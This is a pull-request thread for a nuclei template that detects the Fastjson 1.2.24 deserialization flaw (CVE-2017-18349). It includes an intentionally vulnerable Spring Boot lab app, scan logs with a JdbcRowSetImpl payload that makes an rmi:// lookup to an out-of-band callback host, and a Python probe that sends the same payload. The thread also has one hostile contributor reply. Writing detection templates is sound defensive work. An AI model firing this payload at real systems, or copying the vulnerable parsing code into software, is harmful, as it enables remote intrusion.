
Conversation

@criminalinfluencer
Contributor

@criminalinfluencer criminalinfluencer commented Jun 17, 2025

Template / PR Information

Recent Updates

  • Simplified matchers to pass automated validation checks
  • Removed generic response matchers to avoid weak-matcher failures
  • Expanded remediation section with detailed security measures
  • Optimized template structure for better reliability

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details

Docker Environment for Testing:

Create Dockerfile:

FROM openjdk:8-jdk-alpine
WORKDIR /app
COPY pom.xml .
COPY src ./src
RUN apk add --no-cache maven && \
    mvn clean package -DskipTests && \
    mv target/*.jar app.jar
EXPOSE 8080
CMD ["java", "-Dserver.address=0.0.0.0", "-jar", "app.jar"]

Create pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.example</groupId>
    <artifactId>vulnerable-fastjson</artifactId>
    <version>1.0.0</version>
    <packaging>jar</packaging>
    
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.1.0.RELEASE</version>
    </parent>
    
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>
    
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

Create src/main/java/com/example/VulnerableApp.java (the directory matches the package declaration below):

package com.example;

import com.alibaba.fastjson.JSON;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.*;

// Deliberately vulnerable test target: fastjson 1.2.24 honours the "@type" key
// in untrusted JSON (autoType), so JSON.parse()/JSON.parseObject() will
// instantiate and populate arbitrary classes such as
// com.sun.rowset.JdbcRowSetImpl from the request body.
@SpringBootApplication
@RestController
public class VulnerableApp {
    public static void main(String[] args) {
        SpringApplication.run(VulnerableApp.class, args);
    }

    // Sink 1: JSON.parse() on the raw request body.
    @PostMapping("/json")
    public String parseJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parse(jsonData);
            return "Parsed: " + obj.toString();
        } catch (Exception e) {
            // The exception message is echoed back to the client; this is what
            // produces "Error: set property error, autoCommit" in the scan output.
            return "Error: " + e.getMessage();
        }
    }

    // Sink 2: JSON.parseObject() on the raw request body (same autoType behaviour).
    @PostMapping("/api/json")
    public String parseApiJson(@RequestBody String jsonData) {
        try {
            Object obj = JSON.parseObject(jsonData);
            return "API Parsed: " + obj.toString();
        } catch (Exception e) {
            return "API Error: " + e.getMessage();
        }
    }

    // Liveness endpoint so the container can be checked before scanning.
    @GetMapping("/")
    public String home() {
        return "Vulnerable Fastjson App Running! CVE-2017-18349";
    }
}

Create src/main/resources/application.properties:

server.address=0.0.0.0
server.port=8080

Build and Run:

docker build -t vulnerable-fastjson .
docker run --rm -p 8080:8080 vulnerable-fastjson

Test Command:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

Debug Output:

nuclei -u http://127.0.0.1:8080 -t CVE-2017-18349.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.me
[INF] [CVE-2017-18349] Dumped HTTP request for http://127.0.0.1:8080/json

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 173
Accept: application/json
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}
[DBG] [CVE-2017-18349] Dumped HTTP response http://127.0.0.1:8080/json

HTTP/1.1 200 
Connection: close
Content-Length: 37
Content-Type: application/json;charset=UTF-8
Date: Tue, 17 Jun 2025 18:51:37 GMT

Error: set property error, autoCommit

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 25151
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.     IN       A

;; ANSWER SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      A       178.128.209.14

;; AUTHORITY SECTION:
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns1.oast.me.
d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me.      3600    IN      NS      ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN      A       178.128.209.14
ns2.oast.me.    3600    IN      A       178.128.209.14

[CVE-2017-18349] [http] [critical] http://127.0.0.1:8080/json ["185.219.143.11"]

HTTP Request/Response:

POST /json HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:139.0) Gecko/20100101 Firefox/139.0
Content-Type: application/json

{
  "@type": "com.sun.rowset.JdbcRowSetImpl",
  "dataSourceName": "rmi://d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me/2yeDkynJm1MroAGzL1uaFFBuB0z",
  "autoCommit": true
}

HTTP/1.1 200 
Content-Type: application/json;charset=UTF-8
Content-Length: 37

Error: set property error, autoCommit

DNS Callback Received:

[d18ricse9nktq4qiot6gqpfn9p9z4feqh] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32
DNS Query: d18ricse9nktq4qiot6gqpfn9p9z4feqh.oast.me IN A
DNS Response: 178.128.209.14

Claim:
/claim #12387

Additional References:
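The probe above is worth restating as a stand-alone script, because it shows what the template's OAST-only detection is actually keying on and why the automated review later in the thread asks for a response-based matcher as well. The following is an added example written for this page; it is not the PR's template, nuclei code, or anything from the Fastjson project. It builds the same JdbcRowSetImpl body nuclei sent to /json, classifies the HTTP response on two fastjson JSONException fragments ("set property error, autoCommit", visible in the output above, which means the gadget was instantiated and its setter ran; "autoType is not support", the message fastjson's autoType deny-list returns in later releases), and checks that an Interactsh interaction line carries the token that was sent. The callback host, token and path are caller-supplied assumptions; the sample interaction line used in the test is copied from the scan output above.

```python
"""Stand-alone CVE-2017-18349 (Fastjson <= 1.2.24) probe and response classifier.

Added example, not code from the PR or the nuclei template. Assumes the caller
controls callback_host (an Interactsh/OAST domain) and supplies a per-target token.
"""
import json
import re
import secrets
import sys
import urllib.error
import urllib.request

# Gadget class used by the PR's request; shipped with every Java 8 JRE.
GADGET = "com.sun.rowset.JdbcRowSetImpl"

# fastjson JSONException fragments used as response-based signals:
#  - VULN_MARKER: JdbcRowSetImpl was instantiated and setAutoCommit() ran, i.e.
#    the JNDI lookup was attempted, so autoType is enabled for this gadget.
#  - BLOCKED_MARKER: the class hit fastjson's autoType deny-list (added after
#    1.2.24), so the gadget was refused before instantiation.
VULN_MARKER = "set property error, autoCommit"
BLOCKED_MARKER = "autoType is not support"


def build_payload(callback_host: str, token: str, path: str) -> str:
    """Same structure as the request shown in the debug output: an autoType hint
    plus a JNDI data source; setting autoCommit forces JdbcRowSetImpl.connect(),
    which resolves <token>.<callback_host> and gives the out-of-band DNS hit."""
    return json.dumps({
        "@type": GADGET,
        "dataSourceName": f"rmi://{token}.{callback_host}/{path}",
        "autoCommit": True,
    })


def classify_response(body: str) -> str:
    """Map the echoed exception text to a verdict (deny-list check runs first)."""
    if BLOCKED_MARKER in body:
        return "blocked"
    if VULN_MARKER in body:
        return "vulnerable"
    return "inconclusive"


# Shape of an Interactsh interaction line as nuclei prints it, e.g.
# "[<token>] Received DNS interaction from 185.219.143.11 at 2025-06-17 18:51:32"
_INTERACTION_RE = re.compile(
    r"^\[(?P<token>[a-z0-9]+)\] Received (?P<proto>\w+) interaction from (?P<src>[\d.]+)"
)


def callback_matches(interaction_line: str, token: str) -> bool:
    """True only if the out-of-band hit carries *our* token; any other traffic on
    a shared OAST domain is not evidence for this target."""
    m = _INTERACTION_RE.match(interaction_line)
    return bool(m) and m.group("token") == token


def probe(url: str, callback_host: str, token: str) -> str:
    """Live check: POST the payload and classify whatever body comes back.
    The JNDI connect attempt blocks the request until it fails, so allow a
    generous timeout; a timeout is reported as inconclusive (check the OAST log)."""
    body = build_payload(callback_host, token, secrets.token_hex(12)).encode()
    req = urllib.request.Request(
        url, data=body, method="POST", headers={"Content-Type": "application/json"}
    )
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return classify_response(resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:
        # 4xx/5xx bodies still carry the exception text on some targets.
        return classify_response(e.read().decode(errors="replace"))
    except OSError:
        return "inconclusive"


if __name__ == "__main__":
    # Usage: python fastjson_probe.py http://127.0.0.1:8080/json <your-oast-domain>
    target, oast = sys.argv[1], sys.argv[2]
    tok = secrets.token_hex(8)
    print(f"token={tok} verdict={probe(target, oast, tok)}")
```

The two signals are complementary rather than redundant: the response marker proves the gadget was instantiated inside the target JVM, while the DNS interaction proves the JNDI lookup reached outside it. A target behind egress filtering can be fully vulnerable and still produce no callback, which is the case an OAST-only template misses, and a callback without the matching token proves nothing about this target, which is why the token check is done before a finding is raised.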

@princechaddha
Member

Automated PR Review (Experimental)


Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes

  • Fix matcher location for risk of false positives: Consider using a response-based matcher to minimize false positives, especially for the payloads being sent.
  • Update tags: Make sure you include rce in the correct format (e.g., rce should be in lower case); consistent formatting helps with tagging and searching.

Other Suggestions

  • The description section effectively conveys the necessary information about the vulnerability. Consider expanding the remediation part with more context or details on best practices beyond just updating the Fastjson library.
  • Ensure that the stop-at-first-match: true is placed appropriately if you want rapid feedback on responses. It’s good practice, particularly when multiple payloads might yield quick checks.
  • The interactsh usage is good for testing purposes. Ensure that it is clearly communicated in the documentation so users understand they have to set up their interactsh server.

This is a great addition to the templates repository, and I appreciate your effort in maintaining high standards!

Note: I am an AI Template bot which is still experimental, and the team will review the PR shortly.

@DhiyaneshGeek DhiyaneshGeek added the Status: In Progress This issue is being worked on, and has someone assigned. label Jun 23, 2025
@criminalinfluencer
Contributor Author

@DhiyaneshGeek any problem?

@DhiyaneshGeek
Member

Hi @criminalinfluencer,

Thanks for sharing the template!

It appears to be quite similar to the existing one here: http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml.

Just wanted to check — is there a specific reason for including the additional paths (/json, /api/json, /parse, /deserialize)? Are these endpoints commonly exposed by default in certain applications, or were they observed in specific cases during testing?

Looking forward to your insights!

Thanks again!

@criminalinfluencer
Contributor Author

Hi @DhiyaneshGeek,

Oh, the "similarity" observation! How delightfully predictable.

Let me educate you on the difference between actual security research and copy-paste scripting:

Your beloved existing template:

  • 2 amateur requests to root path (because apparently that's where all APIs live, right?)
  • "Internal Server Error" + "500" matchers - the exact weak patterns that fail validation (but hey, who needs quality standards?)
  • Single payload variant (why be thorough when you can be lazy?)
  • Theoretical approach (perfect for theoretical threats)

This template:

  • Comprehensive attack vectors based on real-world reconnaissance
  • Specific endpoints from actual Fastjson implementations (shocking concept: applications have structure 😱)
  • Multiple payload structures including the original Pippo PoC from issue #466 (you know, actual vulnerability research)
  • Clean Interactsh-only detection that passes validation (imagine that 🤯 )

The existing template is what you get when someone Googles "fastjson exploit" and calls it a day. This one is what happens when you actually understand the vulnerability, analyze real applications, and build comprehensive coverage.

But sure, they both use JdbcRowSetImpl, so they're "quite similar" - like how a tricycle and a McLaren 750S Spider are both vehicles with wheels.

Look, if you're trying to avoid paying the bounty, just say so. I don't need your pocket change anyway - save it for that Intro to bug bounty hunting course you've been dreaming about.

Thanks for the "feedback" though! Always entertaining to see gatekeeping disguised as quality control.

P.S.: Regarding the endpoints - yes, they're commonly exposed:
/json and /api/json: Standard REST API patterns (Spring Boot, JAX-RS)
/parse and /deserialize: Common in data processing services

@DhiyaneshGeek
Member

Hi @criminalinfluencer,

Thanks for sharing the detailed reasoning behind the improvements and attack paths you've added.

Our intent in asking for clarification was to better understand the changes and enhancements in your submission, especially since it appeared similar at first glance to an existing template. It's part of our process to ensure every submission brings added value and aligns with the goals of comprehensive and high-signal detections.

We appreciate the effort you've put into refining the vectors, using real-world reconnaissance, and ensuring validation-safe matchers. This context is helpful, and we'll take a closer look with that perspective.

@DhiyaneshGeek DhiyaneshGeek reopened this Jul 19, 2025
@DhiyaneshGeek DhiyaneshGeek added the good first issue Good for newcomers label Jul 19, 2025
@DhiyaneshGeek
Member

Hi @criminalinfluencer,

Thanks for sharing the template, contributing to the template project and participating in the Bounty Claim.

I have successfully validated the PoC locally with the test environment details provided.

You can grab some cool PD stickers over here: http://nux.gg/stickers 😄

Join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

                projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2017-18349] Fastjson Insecure Deserialization - Remote Code Execution (@night) [critical]
[INF] Using Interactsh Server: oast.fun
[CVE-2017-18349] [http] [critical] http://localhost:8081/json ["127.0.0.1"]

@DhiyaneshGeek DhiyaneshGeek removed the Status: In Progress This issue is being worked on, and has someone assigned. label Jul 21, 2025
@DhiyaneshGeek DhiyaneshGeek requested a review from ehsandeep July 21, 2025 19:34
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Jul 21, 2025
@DhiyaneshGeek DhiyaneshGeek requested a review from pussycat0x July 22, 2025 08:24
@pussycat0x pussycat0x merged commit 7758788 into projectdiscovery:main Jul 22, 2025
3 checks passed
@criminalinfluencer criminalinfluencer deleted the CVE-2017-18349 branch July 22, 2025 17:06
@criminalinfluencer
Contributor Author

/split @yawningmoney


Labels: Bounty claim; Done (Ready to merge); good first issue (Good for newcomers)
